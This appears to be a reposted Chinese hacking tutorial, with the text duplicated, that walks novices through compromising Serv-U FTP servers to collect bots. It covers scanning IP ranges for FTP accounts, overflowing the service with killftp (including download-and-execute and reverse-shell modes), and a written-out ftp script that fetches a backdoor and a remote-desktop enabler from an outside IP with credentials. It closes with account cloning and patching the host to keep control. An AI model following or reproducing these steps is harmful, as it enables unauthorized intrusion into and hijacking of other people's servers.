serv-u远程溢出
来源:百度文库 编辑:神马文学网 时间:2024/03/29 18:47:43
通过serv-u漏洞入侵全过程
======================================================================
serv-u漏洞已经发布了好长一段时间了,不过好多菜鸟朋友还没有能够掌握,而且
现在通过这个漏洞还能找很多肉鸡的,现在我就通过演示给广大的菜鸟朋友看一下
怎么来得到权限、放置后门、打补丁的!
serv-u服务器的配置都不错的哦!
=======================================================================
所需要的工具:ftpscan.exe,hotmail的ftp密码帐号扫描工具,
killftp.exe,ftp漏洞溢出程序
wineggdrop, 后门工具
3389.exe,开3389的工具
还有补丁程序,jay的,大家可以看帖子:
http://jdwl.net.cn/qfaq/forum_view.asp?forum_id=5&view_id=2875
其他程序大家可以去清风上去下载!
=======================================================================
需要的操作系统:98、2000、xp、2003下都可以成功溢出,还有大家最好找一个
ftp空间,你可以用自己的肉鸡做,也可以去找一些免费的空间,这个不在本教程
的讨论范围之内!
=======================================================================
现在我们先来扫一些ftp帐号,可写不可写的都可以,我们看看ftpscan的使用方法
FTPSCAN.EXE StartIP EndIP Port Threads [FileName]
ftpscan 开始ip 结束ip ftp端口(一般用21) 线程(看你的机器配置而定) 保存的文件名
好了,我们先让他扫着,下面我们来配置我们的后门程序,我这里用wineggdrop
做演示,详细的配置操作请看作者的说明文件!
后门程序有加壳和未加壳版本,未加壳的版本大家可以自己加下壳,我这里为了
演示的方便就用加过壳的,未加壳的版本要先加壳后配置!
好了我们配置好了,下面我们来制作成自解压文件,为了方便我们的使用!
下面我们把我们所需要的工具上传到我们的ftp空间上!
=======================================================================
好了,现在我们登陆肉鸡来看看扫描结果,OK,找到了几个,我们来溢出看看
在溢出之前我们先来看看killftp的使用方法!
Usage: killftp
killftp
killftp
第一个是直接溢出,也是我们经常要使用的方法,第二个是要下载文件后门程序
并执行,第三个是用反弹端口的方法,你要先用nc监听一个端口,这个在有防火墙
的时候特别有用!
我们来看看!
=======================================================================
好了成功的溢出一台了,我们加帐号先,
0K,我们来上传我们的工具!
echo open 61.187.190.170 >ftp.txt
echo ceshi >>ftp.txt
echo tongtu >>ftp.txt
echo binary >>ftp.txt [可选]
echo get 3389.exe >>ftp.txt
echo get 2.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
delftp.txt
这样我们就成功的上传了我们的工具,一个是我们的后门程序,一个是开3389的
那位说了wineggdrop也能开终端,为什么还要用3389.exe开呢?呵呵,这个是
个人习惯而已!
OK,看看我的操作!
======================================================================
好了,我们已经成功的给他开了终端和放置了后门,现在我们要上去给他打上补丁
顺便给他克隆一个帐号!
等待服务器的重起中!。。。。。。。。。。。。。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
服务器重起还是比较慢的!耐心的等待!
用wineggdrop开终端是不需要重起的哦!我们已经进来了!
这个就是我们的补丁程序,我们先用ftp上传上去
=======================================================================
怎么样,现在这个肉鸡基本上就是你的了,是不是有些成功的喜悦呢?呵呵!
附件:serv-u.rar
======================================================================
serv-u漏洞已经发布了好长一段时间了,不过好多菜鸟朋友还没有能够掌握,而且
现在通过这个漏洞还能找很多肉鸡的,现在我就通过演示给广大的菜鸟朋友看一下
怎么来得到权限、放置后门、打补丁的!
serv-u服务器的配置都不错的哦!
=======================================================================
所需要的工具:ftpscan.exe,hotmail的ftp密码帐号扫描工具,
killftp.exe,ftp漏洞溢出程序
wineggdrop, 后门工具
3389.exe,开3389的工具
还有补丁程序,jay的,大家可以看帖子:
http://jdwl.net.cn/qfaq/forum_view.asp?forum_id=5&view_id=2875
其他程序大家可以去清风上去下载!
=======================================================================
需要的操作系统:98、2000、xp、2003下都可以成功溢出,还有大家最好找一个
ftp空间,你可以用自己的肉鸡做,也可以去找一些免费的空间,这个不在本教程
的讨论范围之内!
=======================================================================
现在我们先来扫一些ftp帐号,可写不可写的都可以,我们看看ftpscan的使用方法
FTPSCAN.EXE StartIP EndIP Port Threads [FileName]
ftpscan 开始ip 结束ip ftp端口(一般用21) 线程(看你的机器配置而定) 保存的文件名
好了,我们先让他扫着,下面我们来配置我们的后门程序,我这里用wineggdrop
做演示,详细的配置操作请看作者的说明文件!
后门程序有加壳和未加壳版本,未加壳的版本大家可以自己加下壳,我这里为了
演示的方便就用加过壳的,未加壳的版本要先加壳后配置!
好了我们配置好了,下面我们来制作成自解压文件,为了方便我们的使用!
下面我们把我们所需要的工具上传到我们的ftp空间上!
=======================================================================
好了,现在我们登陆肉鸡来看看扫描结果,OK,找到了几个,我们来溢出看看
在溢出之前我们先来看看killftp的使用方法!
Usage: killftp
killftp
killftp
第一个是直接溢出,也是我们经常要使用的方法,第二个是要下载文件后门程序
并执行,第三个是用反弹端口的方法,你要先用nc监听一个端口,这个在有防火墙
的时候特别有用!
我们来看看!
=======================================================================
好了成功的溢出一台了,我们加帐号先,
0K,我们来上传我们的工具!
echo open 61.187.190.170 >ftp.txt
echo ceshi >>ftp.txt
echo tongtu >>ftp.txt
echo binary >>ftp.txt [可选]
echo get 3389.exe >>ftp.txt
echo get 2.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
delftp.txt
这样我们就成功的上传了我们的工具,一个是我们的后门程序,一个是开3389的
那位说了wineggdrop也能开终端,为什么还要用3389.exe开呢?呵呵,这个是
个人习惯而已!
OK,看看我的操作!
======================================================================
好了,我们已经成功的给他开了终端和放置了后门,现在我们要上去给他打上补丁
顺便给他克隆一个帐号!
等待服务器的重起中!。。。。。。。。。。。。。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
服务器重起还是比较慢的!耐心的等待!
用wineggdrop开终端是不需要重起的哦!我们已经进来了!
这个就是我们的补丁程序,我们先用ftp上传上去
=======================================================================
怎么样,现在这个肉鸡基本上就是你的了,是不是有些成功的喜悦呢?呵呵!
附件:serv-u.rar
serv-u远程溢出
远程修改Serv-U FTP用户的登录密码
serv-u
Serv-U
Serv-U
Serv-U限制文件类型
信息中心 - Serv-U使用图解 -
全面提高Serv-U安全配置
IIS5.0 .printer远程溢出漏洞
Serv-U漏洞,一招致命
FTP服务器端软件Serv-U教程
让 Serv-U 通过数据库管理 FTP
Serv-U服务器的管理
Serv-U v6.0 本地权限提升漏洞
FTP Serv-U密码问题 - 技术应用子站 - 赛迪网
FTP服务器端软件Serv-U安装和配置教程
Serv-U利用SSL打造安全的FTP文件传输
Serv-U为域帐户统一设置根目录
Serv-U安全设置攻略 - Wyulnnhtg‘s Blog - 51CTO技术博客-领...
Adsl+花生壳+Serv-U建个人网站 - 大佛在线的日志 - 网易博客
一次Serv-u下的提权(适合初学提权的朋友)
iis 外网不能访问?内网建立IIS或Serv-U在外网都没办法访问
用Serv-U FTP Server构建自己的强力FTP服务器
溢出工具包:Metasploit使用说明